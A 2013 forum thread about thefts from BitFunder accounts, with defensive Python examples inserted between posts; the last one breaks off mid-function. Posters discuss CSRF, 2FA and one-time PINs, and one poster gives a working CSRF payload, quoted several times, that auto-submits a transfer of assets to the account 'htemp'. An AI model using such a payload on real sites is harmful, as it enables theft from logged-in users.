Bitcoin Forum

Economy => Service Discussion => Topic started by: HorseRider on July 06, 2013, 06:23:04 AM



Title: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: HorseRider on July 06, 2013, 06:23:04 AM
A long-time Avalon miner and a very trustworthy Bitcoiner has emailed me the story. It is written in Chinese and I am translating it. I just post this letter here for discussion.


My username on BITFUNDER is lixiulai@sina.com, and the login password is different from my other accounts. On 20 June, I found that my 2,869 shares of G.SDICE and 9.99 BTC had disappeared. I checked the records and found that my Bitcoin was first used to purchase G.SDICE, then all the G.SDICE shares were transferred to another account, “htemp”. I didn’t know before that shares on BITFUNDER could be transferred. I wrote an email to BITFUNDER support and asked them to freeze the htemp account, and my request was ignored. Then I kept emailing the manager of BITFUNDER, stating that the share transfer function is very dangerous without two-factor authentication, and asking them to pay back my loss. Surprisingly, the very next day I found that BITFUNDER had forced users to enable 2FA before transferring shares, and I received a letter saying that their exchange was not at fault and it was my own fault for not enabling two-factor authentication.

Another BITFUNDER user, Miss Wang Qiaoqiao, became a victim of the “htemp” theft at nearly the same time as me. Then I started to suspect that BITFUNDER itself had been hacked, so that htemp could steal from two people at the same time.

That’s the summary. Here are the records of the emails between BITFUNDER support and lixiulai@sina.com.

=============================

My Support Requests

--------------------------------------------------------------------------------
Creation Date Ticket ID Subject Status
2013-06-25 19:54:38 XSQ-194159 I want to know who operated my account. Closed
2013-06-25 19:54:38 Posted By: Me

After my account was stolen, only this reminder. This transfer function is too dangerous; if I have not enabled 2-factor, this function should not be usable. I want to know who operated my account.
2013-06-25 19:58:26 Posted By: Me

Error: Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.


Transfer Shares:

Error: Google 2-Factor MUST be enabled to transfer shares.
2013-06-25 20:02:50 Posted By: Me

Why was my account stolen? Your website only just became like this.
 
2013-06-26 17:57:50 Posted By: Support Staff

Transfer has been limited to 2-factor only support.

Our server was not hacked. Someone used your account that was stolen from somewhere else.

Not our fault.

We are sorry that it happened. We offered protection option to users. You did not use it.

Thank You,
BitFunder Support
 
2013-06-25 05:32:48 TYL-678016 I hope you can give me some compensation. Closed
2013-06-25 05:32:48 Posted By: Me

My account's BTC was used to buy shares, which were then transferred away. I did not know your website had a share transfer function. My password theft case can also be presented to www.weexchange.co. I hope you can give me some compensation.
2013-06-25 16:49:49 Posted By: Support Staff

Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.

You do not and have not had 2-factor enabled. We have no way to verify that you were actually hacked or are the hacker.

We cannot offer any sort of compensation for users who do not properly protect their accounts and passwords.
We have secured our site to the best of our ability, which was not hacked. Your account information was leaked or stolen and we provided the ability of protection beyond that with 2-factor and you chose not to enable it.

Thank You,


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: HorseRider on July 06, 2013, 06:38:29 AM
https://i.imgur.com/6RYD1g7.jpg

https://i.imgur.com/R8mrohs.jpg


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: HorseRider on July 06, 2013, 06:39:48 AM
Records of Bitqiaoqiao@gmail.com:


 
Quote
2013-06-19 01:42:16 Send Transfer To: htemp
TAT.ASICMINER: 10 Share/s
2013-06-19 01:42:02 Send Transfer To: htemp
AMC: 5,617 Share/s
2013-06-19 01:41:50 Send Transfer To: htemp
G.ASICMINER-PT: 8 Share/s


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 06:42:08 AM
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 06:44:03 AM
This is how BitFunder could have fixed it:

Code:

<?php
session_start();
// create one anti-CSRF token per session and keep it; $salt9 is a server-side secret
if (!isset($_SESSION['csrf'])) {
    $_SESSION['csrf'] = hash("SHA256", $salt9 . uniqid());
}

// embed it in every state-changing form; /transfer must refuse any POST whose 'csrf' field differs from $_SESSION['csrf']
echo "<form action='transfer' method='post'>
<input type='hidden' name='csrf' value='{$_SESSION['csrf']}'>";

...


Yes, BitFunder's site is still vulnerable.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: superduh on July 06, 2013, 07:08:21 AM
These are serious flaws and need to be fixed on alllll sites


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 07:19:26 AM
These are serious flaws and need to be fixed on alllll sites
This isn't a 0day that was suddenly discovered. It doesn't need to be fixed on "allll" sites because most sites are not vulnerable in the first place:

https://i.imgur.com/9ChJo4F.png

Every single function on Inputs.io:

Quote
$("#turnonnotify").click(function(){
   $.post("ajax", {token: $.cookie("token"), action: "changenotify", email: "yes"});
   $(this).fadeOut(250).fadeIn(250).html("Turn off");
});
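Added example (not code from the thread, and not BitFunder's or Inputs.io's own code): the server side of the two defences shown in this thread, in Python. The first is the synchronizer token from TradeFortress's PHP fix (random per-session value, embedded as a hidden field, compared on every POST); the second is the pattern in the Inputs.io snippet just above, where the page's own script copies a cookie into the POST body and the server compares the two. The in-memory session dict, the field names and all function names are assumptions made for the demo; the form fields `asset`, `amount` and `to_name` are the ones from the thread.

```python
"""Server-side CSRF checks for a share-transfer endpoint (constructed example).

A form hosted on a third-party site can post 'asset', 'amount' and 'to_name',
but it cannot read the victim's session token or cookie, so the check fails
before any shares move.
"""
import hmac
import re
import secrets
from typing import Dict, Tuple

TOKEN_FIELD = "csrf"      # hidden form field, as in the PHP snippet above
COOKIE_NAME = "token"     # cookie / body field name, as in the Inputs.io snippet


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create the per-session token once (256 bits from the OS CSPRNG) and reuse it."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_hex(32)
    return session[TOKEN_FIELD]


def render_transfer_form(session: Dict[str, str]) -> str:
    """HTML the genuine site serves: the token rides along as a hidden field."""
    token = issue_csrf_token(session)
    return (
        "<form action='transfer' method='post'>\n"
        f"<input type='hidden' name='{TOKEN_FIELD}' value='{token}'>\n"
        "<input type='text' name='asset'><input type='text' name='amount'>"
        "<input type='text' name='to_name'><input type='submit'>\n</form>"
    )


def extract_token(html: str) -> str:
    """What a browser submitting the genuine form sends back (drives the demo)."""
    match = re.search(rf"name='{TOKEN_FIELD}' value='([0-9a-f]+)'", html)
    return match.group(1) if match else ""


def csrf_token_is_valid(session: Dict[str, str], form: Dict[str, str]) -> bool:
    """Synchronizer token: constant-time compare of the posted field with the session copy."""
    expected = session.get(TOKEN_FIELD, "")
    supplied = form.get(TOKEN_FIELD, "")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def double_submit_is_valid(cookies: Dict[str, str], body: Dict[str, str]) -> bool:
    """Double-submit cookie: the body copy must equal the cookie the site itself set.

    Only sound if the page's own script can read the cookie (so it is not HttpOnly)
    and no attacker-controlled origin can set cookies for the site's domain.
    """
    from_cookie = cookies.get(COOKIE_NAME, "")
    from_body = body.get(COOKIE_NAME, "")
    if not from_cookie or not from_body:
        return False
    return hmac.compare_digest(from_cookie.encode(), from_body.encode())


def handle_transfer(session: Dict[str, str], form: Dict[str, str]) -> Tuple[bool, str]:
    """The /transfer handler: refuse before touching any balance if the token is wrong."""
    if not csrf_token_is_valid(session, form):
        return False, "rejected: missing or wrong CSRF token"
    # a real handler would also demand the second factor here, then move the shares
    return True, f"transferred {form['amount']} {form['asset']} to {form['to_name']}"


if __name__ == "__main__":
    session: Dict[str, str] = {}                       # constructed logged-in session
    token = extract_token(render_transfer_form(session))
    genuine = {TOKEN_FIELD: token, "asset": "g.sdpt", "amount": "100", "to_name": "bob"}
    forged = {"asset": "g.sdpt", "amount": "100", "to_name": "htemp"}   # what a cross-site form can post
    print(handle_transfer(session, genuine))   # (True, 'transferred 100 g.sdpt to bob')
    print(handle_transfer(session, forged))    # (False, 'rejected: missing or wrong CSRF token')
```

The token only protects the endpoint if every state-changing request is checked; a single unprotected POST handler is enough for the form in TradeFortress's first post to work again.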


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: pgbit on July 06, 2013, 08:08:48 AM
Would the account hack described above have occurred if 2 factor auth was used?


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 08:12:43 AM
Not through share transfers, but through another method yes. 2FA doesn't help.

Would be fixed if Bitfunder implemented a csrf token.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: PurpleTentacle on July 06, 2013, 08:19:07 AM
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?


Quote
Yes, BitFunder's site is still vulnerable.


If so, how can we protect ourselves?


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Rannasha on July 06, 2013, 08:27:42 AM
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?

Yes.


Quote
Quote
Yes, BitFunder's site is still vulnerable.


If so, how can we protect ourselves?

Unless you use a site that has protected itself from these types of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: PurpleTentacle on July 06, 2013, 08:52:43 AM
Unless you use a site that has protected itself from these types of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 08:56:59 AM
Unless you use a site that has protected itself from these types of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.
You need to log out.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: PurpleTentacle on July 06, 2013, 09:02:22 AM
Unless you use a site that has protected itself from these types of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.
You need to log out.

Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: monsterer on July 06, 2013, 09:37:34 AM
Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

With the monumental security flaws demonstrated in this thread, I would personally:

* Get my bitcoins out
* Get out
* Never come back

The person who wrote that code has no business being in business.

Cheers, Paul.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: TsuyokuNaritai on July 06, 2013, 09:40:46 AM
Are you protected if you use BitFunder in a different browser?


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Deprived on July 06, 2013, 11:48:29 AM
Are you protected if you use BitFunder in a different browser?

Against the easiest ways to attack yes - but I wouldn't recommend thinking of it as 100% safe.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: nubbins on July 06, 2013, 12:39:12 PM
Yipes! As someone who has worked in web development for several years, this is SHOCKING.

I created an account a while ago, but never deposited any BTC because I didn't want to use WeExchange. Now I'm glad that I never!


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 06, 2013, 12:45:35 PM
The easiest way to protect yourself would be using web applications that are coded securely. Now I'm not sure if btct.co uses an anti csrf token (I don't think it does?), but their PIN / 2 FA system makes this attack less useful (an attacker can just use JS to submit ~100 most common PINs)


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: joele on July 06, 2013, 01:19:13 PM
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Yes, this code will work if you
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?


Quote
Yes, BitFunder's site is still vulnerable.


If so, how can we protect ourselves?

Enable your 2FA; this code will not work if you enable your 2FA, because once you have enabled it, the 2fa field with the correct value is needed to complete the transfer.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: pikeadz on July 06, 2013, 01:34:56 PM
So what it sounds like to me, a layperson, is that bitfunder has some shitty code that potentially allows for a fraudulent transfer to happen. 

OP is bitter because he and another person lost their shares due to 1) that exploit AND 2) their failure to use 2 factor authentication.  If they had used 2fa, they would still have their shares/coins.  Is that correct?

I'm not saying bitfunder shouldn't have to revamp that code.  In fact, they should fess up to this flaw and as a kind gesture, refund the coins.  But isn't this exactly the type of thing 2fa is designed to prevent?  Who in their right mind WOULDN'T enable it, especially AFTER something like this has happened to you.  (if you read the transcript, this fool didn't even enable it after the loss) 



Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: MPOE-PR on July 06, 2013, 02:04:05 PM
Websites are not safe for this application. Learn GPG. That is all.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: nubbins on July 06, 2013, 02:06:40 PM
Websites are not safe for this application. Learn GPG. That is all.

I detect many suppressed lels in this statement.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Lohoris on July 06, 2013, 07:40:09 PM
Yipes! As someone who has worked in web development for several years, this is SHOCKING.

I created an account a while ago, but never deposited any BTC because I didn't want to use WeExchange. Now I'm glad that I never!
+1


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Ukyo on July 06, 2013, 07:41:22 PM
So what it sounds like to me, a layperson, is that bitfunder has some shitty code that potentially allows for a fraudulent transfer to happen. 

OP is bitter because he and another person lost their shares due to 1) that exploit AND 2) their failure to use 2 factor authentication.  If they had used 2fa, they would still have their shares/coins.  Is that correct?

I'm not saying bitfunder shouldn't have to revamp that code.  In fact, they should fess up to this flaw and as a kind gesture, refund the coins.  But isn't this exactly the type of thing 2fa is designed to prevent?  Who in their right mind WOULDN'T enable it, especially AFTER something like this has happened to you.  (if you read the transcript, this fool didn't even enable it after the loss) 

Very much agreed.

Now that BitFunder and WeExchange are finally getting a support staff team to help offload tickets and other requests, I am now able to spend more time focusing on operations, including the legalization of BitFunder, and hiring additional developers and even multi-lingual support staff.

We have already begun conducting a full code review and started on a backend systems redesign with lots of new features and, most importantly, security in mind.

-Ukyo


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Lastro on July 06, 2013, 08:43:24 PM
(if you read the transcript, this fool didn't even enable it after the loss) 



Is he a fool? His account was cleaned out.

Quote
Very much agreed.

What are you agreeing to, Ukyo? A refund to the OP?


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Ukyo on July 06, 2013, 09:15:14 PM
(if you read the transcript, this fool didn't even enable it after the loss) 



Is he a fool? His account was cleaned out.

Quote
Very much agreed.

What are you agreeing to, Ukyo? A refund to the OP?

He was calling him a fool because after the cleanout, the user still refused to enable 2factor.

I am agreeing to a code revamp and update with more enhanced security options and features which we started a few weeks ago when this problem with transfers was fixed requiring google 2-factor authentication. Without 2-factor, anyone can claim "I was hacked! It was a bad website, it was a trojan, a virus loaded pages and grabbed a per-page generated code and did everything!"
Unfortunately there is so much fraud and so many fraudsters when it comes to bitcoin, that we cannot accept that as an answer since there is no proof otherwise.
This is why we have adopted the 2-factor requirement. We are looking to add additional options such as optional pins (That can easily be recorded one time by a trojan though), yubikeys, and other new technologies.

-Ukyo


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: muasktak10 on July 07, 2013, 03:28:58 AM
This comment isn't really beneficial to the conversation.... but no wonder the price of btc is tanking.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: EskimoBob on July 07, 2013, 07:57:29 AM
You are using Google's 2-step verification and this requires a phone that supports it.
What if I do not have nor like those huge shiny slabs of glass and plastic, every fashion victim drags around so happily - drooling, while finger fucking his/her phone every waking moment.

mtGox sent me a yubikey for free ;) I know, you probably can not do this right now but there has to be a way to fix those security issues by not forcing your clients to depend on some third party crap from Google. Especially from Google.

Even PIN provides some level of protection, when every failed attempt causes n+1 seconds delay. Add a letter to 4 digit PIN and it got way better.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: ninjaboon on July 07, 2013, 08:49:04 AM
You are using Google's 2-step verification and this requires a phone that supports it.
What if I do not have nor like those huge shiny slabs of glass and plastic, every fashion victim drags around so happily - drooling, while finger fucking his/her phone every waking moment.

mtGox sent me a yubikey for free ;) I know, you probably can not do this right now but there has to be a way to fix those security issues by not forcing your clients to depend on some third party crap from Google. Especially from Google.

Even PIN provides some level of protection, when every failed attempt causes n+1 seconds delay. Add a letter to 4 digit PIN and it got way better.

I also have a free yubikey from Mt.Gox but not many sites support it.
So I'm forced to use Google 2FA and I have it installed on 3 devices for backup purposes.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 07, 2013, 09:51:20 AM
Just use one of the web g 2fas.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: davout on July 07, 2013, 09:57:50 AM
You are using Google's 2-step verification and this requires a phone that supports it.
What if I do not have nor like those huge shiny slabs of glass and plastic, every fashion victim drags around so happily - drooling, while finger fucking his/her phone every waking moment.

mtGox sent me a yubikey for free ;) I know, you probably can not do this right now but there has to be a way to fix those security issues by not forcing your clients to depend on some third party crap from Google. Especially from Google.

Even PIN provides some level of protection, when every failed attempt causes n+1 seconds delay. Add a letter to 4 digit PIN and it got way better.
Google Auth is an implementation of open standards called TOTP and HOTP that you can use on a regular computer (or theoretically with a watch, a pen and paper). Hurr'durr'ing is hardly justified here.

I also have a free yubikey from Mt.Gox but not many sites support it.
No other site than mtgox itself can support the Yubikey they send you. If you see a site claiming that they support gox's keys too you should run.
The reason is that a yubikey contains an AES key that is used to generate and validate OTPs, with a regular key you can validate OTPs against the Yubico servers since the AES key is filled in by Yubico itself. At mtgox they flash the keys and replace them with AES keys they only know, making the key effectively unusable anywhere else than at gox itself.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: EskimoBob on July 07, 2013, 11:25:38 AM
Can you generate PINs that can be used only once? The question is how to deliver the list of keys to your client so that "they" (the bad guys) do not have them :)
  
Code:
1)  11975
2)  14975
3)  07277
4)  06680
5)  14321
6)  28753
7)  90415
8)  91468
9)  99442
10) 95016
...

None of the numbers can be reused. When I log in and start a transfer or any other operation where coins/shares move, the system asks for PIN #?. Let's say I have used 1-3, so it asks for PIN #4 and then for #5, etc.
If I screw up and enter PIN #4 incorrectly, PIN #5 will be asked and so on.
If you add a delay, that starts to grow after every wrong entry, brute force becomes pointless. Even better, lock the account down after 5 wrong PIN entries and send out an e-mail.
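Added example (not code from the thread): the one-time PIN list EskimoBob describes, implemented in Python the way a server would verify it. The list is his sample list; the verifier asks for the PINs in order, burns each one whether the entry was right or wrong, doubles the delay after every wrong entry, and locks the account and fires an alert callback after five wrong entries. The class and method names, the doubling schedule and the five-failure limit are choices made for this demo; time is passed in explicitly so the behaviour can be checked without sleeping.

```python
"""One-time PIN list with a growing delay and lockout (constructed example).

Each sensitive operation asks for the next numbered PIN. Every attempt, right or
wrong, burns that PIN, so a keylogger that captured PIN #4 cannot reuse it.
"""
from dataclasses import dataclass
import hmac
from typing import Callable, List, Optional

MAX_FAILURES = 5   # wrong entries before the account is locked and an alert goes out

# the example list posted in the thread, in the order it was printed
SAMPLE_PINS = ["11975", "14975", "07277", "06680", "14321",
               "28753", "90415", "91468", "99442", "95016"]


@dataclass
class PinListVerifier:
    pins: List[str]                                  # server copy of the list given to the user
    alert: Optional[Callable[[str], None]] = None    # e.g. a function that e-mails the user
    position: int = 0                                # index of the PIN asked for next
    failures: int = 0                                # consecutive wrong entries
    locked: bool = False
    next_allowed: float = 0.0                        # earliest time another attempt is accepted

    def next_pin_number(self) -> Optional[int]:
        """1-based number of the PIN to ask the user for, or None if locked/exhausted."""
        if self.locked or self.position >= len(self.pins):
            return None
        return self.position + 1

    def check(self, entered: str, now: float) -> str:
        """Consume one PIN; returns 'ok', 'wrong', 'wait', 'locked' or 'exhausted'."""
        if self.locked:
            return "locked"
        if now < self.next_allowed:
            return "wait"               # still inside the delay; nothing is consumed
        if self.position >= len(self.pins):
            return "exhausted"          # the user needs a fresh list
        expected = self.pins[self.position]
        self.position += 1              # burned whether or not the entry is right
        if hmac.compare_digest(expected.encode(), entered.encode()):
            self.failures = 0
            return "ok"
        self.failures += 1
        self.next_allowed = now + 2 ** self.failures    # 2, 4, 8, 16, 32 seconds
        if self.failures >= MAX_FAILURES:
            self.locked = True
            if self.alert:
                self.alert(f"account locked after {self.failures} wrong PIN entries")
            return "locked"
        return "wrong"


if __name__ == "__main__":
    v = PinListVerifier(list(SAMPLE_PINS), alert=print)
    print(v.check("11975", now=0.0))    # ok    (PIN #1)
    print(v.check("99999", now=1.0))    # wrong (PIN #2 burned, 2 s delay starts)
    print(v.check("07277", now=2.0))    # wait  (too early; PIN #3 is not consumed)
    print(v.check("07277", now=3.0))    # ok
```

Because a wrong entry burns a PIN, the list shrinks by one per failed guess and the delay doubles at the same time, which is what makes brute force pointless here; the open problem EskimoBob raises, delivering the list to the user without the attacker seeing it, is not solved by this code.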


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: nubbins on July 07, 2013, 04:13:39 PM
blockchain.info's SMS verification is similar to what you're describing. The login page sends you a one-time code via SMS that you must enter into the browser, along with username and password.

For a trivial amount of effort, you could extend this to any sensitive action: sell, transfer, etc. No yubikey or even smartphone required, just a phone that can receive SMS. The security-minded could purchase a cheap prepaid mobile phone for this purpose, and keep it in a secure location.

I'm not sure of the cost related to sending out that many SMS messages, but that's not an insurmountable problem.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Lohoris on July 07, 2013, 04:22:45 PM
blockchain.info's SMS verification is similar to what you're describing. The login page sends you a one-time code via SMS that you must enter into the browser, along with username and password.

For a trivial amount of effort, you could extend this to any sensitive action: sell, transfer, etc. No yubikey or even smartphone required, just a phone that can receive SMS. The security-minded could purchase a cheap prepaid mobile phone for this purpose, and keep it in a secure location.

I'm not sure of the cost related to sending out that many SMS messages, but that's not an insurmountable problem.
very good observation.

the cost of sending many SMS is quite low if you buy them in bulk, so as long as you have *any* profit, that would be fine.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: nubbins on July 07, 2013, 04:49:21 PM
Moderate increase in tx fees for those who have SMS verification enabled, say.

It might not make economical sense for smaller trades, but the trading bots don't have mobile phones, so there's no big worry there.  ;)


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Ukyo on July 07, 2013, 07:03:43 PM
I agree that there need to be more options than just 2-factor.

I have been talking with Yubikey about some alternative solutions, even for mobile access  as well as working on a big and controversial id verification method that will be optional as well. :)

Thanks,
Ukyo


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: prof7bit on July 08, 2013, 06:52:27 PM
So, I can use google 2-factor without a phone ?

The wikipedia page about it http://en.wikipedia.org/wiki/Google_Authenticator lists a whole bunch of alternative implementations, including ones for Windows (or Linux or Mac) desktops as well as the **trivial** 10 lines of code that describe the algorithm, so you could probably even implement it yourself in a few lines of any scripting language. A phone is really not needed to run this extremely simple code.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Entropy-uc on July 08, 2013, 07:43:46 PM
(if you read the transcript, this fool didn't even enable it after the loss)  



Is he a fool? His account was cleaned out.

Quote
Very much agreed.

What are you agreeing to, Ukyo? A refund to the OP?

He was calling him a fool because after the cleanout, the user still refused to enable 2factor.

I am agreeing to a code revamp and update with more enhanced security options and features which we started a few weeks ago when this problem with transfers was fixed requiring google 2-factor authentication. Without 2-factor, anyone can claim "I was hacked! It was a bad website, it was a trojan, a virus loaded pages and grabbed a per-page generated code and did everything!"
Unfortunately there is so much fraud and so many fraudsters when it comes to bitcoin, that we cannot accept that as an answer since there is no proof otherwise.
This is why we have adopted the 2-factor requirement. We are looking to add additional options such as optional pins (That can easily be recorded one time by a trojan though), yubikeys, and other new technologies.

-Ukyo

Am I the only one finding your excuse for not refunding victims here a little disingenuous?

The 'htemp' hack has been documented by many people, and the root cause was a clear defect in your security model.  But you won't own up to the failure because somebody might pretend to be hacked?  You have a clear trail for anyone who had funds transferred to the 'htemp' account.

I don't see how you can justify not compensating victims in this case.  Considering the huge fees you are collecting on trades you should take a day's income and make your mistake right for the victims.  If you want to require 2FA for compensation in the future, that is a different matter.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Ukyo on July 08, 2013, 10:13:16 PM
Am I the only one finding your excuse for not refunding victims here a little disingenuous?

The 'htemp' hack has been documented by many people, and the root cause was a clear defect in your security model.  But you won't own up to the failure because somebody might pretend to be hacked?  You have a clear trail for anyone who had funds transferred to the 'htemp' account.

I don't see how you can justify not compensating victims in this case.  Considering the huge fees you are collecting on trades you should take a day's income and make your mistake right for the victims.  If you want to require 2FA for compensation in the future, that is a different matter.

The issue was not from a cross-site post, but from a list of user/passwords that were used by an abuser.

There was a cross-site vulnerability which has now been fixed. (https://bitcointalk.org/index.php?topic=130117.msg2685210#msg2685210)

The users affected by 'htemp' and 2 other user accounts had their accounts directly accessed by a 3rd party on the first attempt, who were testing a user/pass list which looks to be stolen from another site.

There were only 2 reported incidents of any account hacking via cross-site scripting, which were indeed credited.
Since the 2-factor requirement for transfers has been in place, there have been no further reports of abuse.

I suggest using a different e-mail/password combination on different bitcoin based sites out there, as you never know who else out there gets hacked and they never tell you.

Our system logged a botnet of over 5,000 account attempts one after another. The majority of the matching ones had 2-factor enabled which stopped their account loss.
Those known users were already contacted weeks ago to let them know of the situation and their vulnerability and that they should change that password combination on other sites.

-Ukyo
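Added example (not from the thread, and not BitFunder's logging or code): a small Python triage of login logs for the pattern Ukyo describes, a stolen user/password list replayed against many accounts from one source, with the matches split into those the 2FA prompt stopped and those that were taken over. The log format, the IP addresses and every name in the sample are constructed for the example; the threshold of five distinct accounts per IP is an assumption.

```python
"""Credential-stuffing triage over login logs (constructed example).

A real user retries one account a few times; a stuffing run tries many
different accounts from the same source, each once. Matches from such a
source are the accounts whose password is now known to the attacker.
"""
from collections import defaultdict
import re
from typing import Dict, Iterable, List, NamedTuple

# constructed log lines: one login attempt per line (documentation IP ranges)
SAMPLE_LOG = """\
2013-06-19 01:40:01 ip=198.51.100.7 user=alice result=FAIL
2013-06-19 01:40:02 ip=198.51.100.7 user=bob result=OK twofa=required
2013-06-19 01:40:02 ip=198.51.100.7 user=carol result=FAIL
2013-06-19 01:40:03 ip=198.51.100.7 user=dave result=FAIL
2013-06-19 01:40:03 ip=198.51.100.7 user=erin result=OK twofa=none
2013-06-19 01:40:04 ip=198.51.100.7 user=frank result=FAIL
2013-06-19 08:15:10 ip=203.0.113.5 user=alice result=FAIL
2013-06-19 08:15:25 ip=203.0.113.5 user=alice result=FAIL
2013-06-19 08:15:40 ip=203.0.113.5 user=alice result=OK twofa=none
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)"
    r"(?: twofa=(?P<twofa>\S+))?$"
)


class Attempt(NamedTuple):
    ts: str
    ip: str
    user: str
    ok: bool
    twofa: str   # "required", "none", or "" when the password did not match


def parse_log(text: str) -> List[Attempt]:
    """Parse the log, skipping lines that do not have the expected shape."""
    attempts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            attempts.append(Attempt(m["ts"], m["ip"], m["user"],
                                    m["result"] == "OK", m["twofa"] or ""))
    return attempts


def stuffing_sources(attempts: Iterable[Attempt], min_users: int = 5) -> Dict[str, List[str]]:
    """IPs that tried at least `min_users` distinct accounts, with the accounts they touched."""
    users_by_ip = defaultdict(set)
    for a in attempts:
        users_by_ip[a.ip].add(a.user)
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) >= min_users}


def matched_credentials(attempts: Iterable[Attempt],
                        suspect_ips: Iterable[str]) -> Dict[str, List[str]]:
    """Accounts whose password matched from a suspect IP, split by whether 2FA stopped the login.

    'blocked_by_2fa': password is known elsewhere, user must change it (Ukyo's notification).
    'compromised': the session was obtained; freeze the account and review its transfers.
    """
    suspects = set(suspect_ips)
    out = {"blocked_by_2fa": set(), "compromised": set()}
    for a in attempts:
        if a.ip in suspects and a.ok:
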